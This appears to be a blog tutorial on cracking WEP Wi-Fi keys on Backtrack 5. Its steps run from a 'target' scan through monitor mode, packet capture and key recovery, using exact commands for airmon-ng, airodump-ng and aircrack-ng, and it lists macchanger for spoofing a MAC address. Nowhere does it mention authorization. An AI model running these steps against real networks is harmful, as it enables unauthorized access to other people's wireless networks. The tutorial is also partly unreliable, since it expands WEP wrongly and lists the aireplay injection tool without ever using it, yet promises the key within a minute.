- This tutorial aim is to guide you the process of WEP CRACKING On Backtrack 5 .
Should have a knowledge of these terms -
- AP : stands for Access Point or a wireless router .
- MAC Address : stands for ;Media Access Control ,its a unique address , It is in the Hexadecimal format like 00:6B:6B:2F:C8:C8 .
- BSSID : It is the AP Mac Address.
- ESSID : It shows the AP broadcasting name .
- WEP : stands for Wired Equivalency Protocol .
- WEP is a security protocol for Wifi (Wireless fidility) Networks.
Tools used to Crack WEP are -
- iwconfig : A tool that for configure wireless adapter
- macchanger : A tool that allow you to spoof your Mac Address.
- airmon - a tool that set your wireless adapter into monitor mode .
- airodump - a tool that capture packet from the wireless router.
- aireplay - a tool for forging ARP request.
- aircrack - a tool for decrypting WEP keys .
- Backtrack 5 distro.
- Wireless Adapter Card
Lets start the Procedure -
Step 1 : Open a new konsole on Backtrack 5
- See the image how to open konsole on Backtrack 5 .
Step 2 : Type the command shown below -
- Command 1: ifconfig wlan0
- Command 2: iwconfig wlan0
- See the image below for more details -
Step 3: Put your Wifi adapter card on Monitor Mode
- Open a new konsole and enter the command shown below -
- Type the following command to put your card into Monitor mode .
- Command : airmon-ng start (your interface)
- Example : airmon-ng start wlan0
- A message is also display on the screen that your monitor mode is enabled.
- See the image for more details -
Step 4: Display the monitor mode .
- New monitor mode created named mon0
- To see the monitor mode enter the command shown below -
- Command : iwconfig
- See the image for more details -
Step 5: Finding a Target
- Now we have to find the network that is protected by the WEP .
- To find those networks we use a simple command shown below -
- Command : airodump-ng mon0
- Here airodump-ng is the command to start the program
- mon0 is the new interface which you created in the earlier step .
- See the image below for more details -
Step 6: Capture the data into file
- To capture the data we use airodump tool with additional switches like --bssid ( mac address), -c (channel), -w (filename )
- Syntax of the commands is -
- Command : airodump-ng mon0 --bssid (Mac Address) -c (channel no.) -w (filename)
- Example : airodump-ng mon0 --bssid 00:08:68:2F:C8:C8 -c 1 -w WEPkey
- See the image below for more details -
Step 7: Open Home Directory to check WEPkey file is created or not .
- Open the Home Directory .
- Check your WEPkey file is created or not .
- See the image below - Image shows WEPkey file is created and saved in the home directory.
Step 8: Crack the WEP Key using Aircrack Tool
- Open a new konsole .
- Then enter the command : aircrack-ng (file name)
- Example : aircrack-ng WEPkey-01.cap
- Withing a minute aircrack will decrypt your WEP key as shown in the image .
- See the image below -
- This is how we can WEP CRACKING on Backtrack 5 .
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- I hope you like this article on WEP CRACKING on Backtrack 5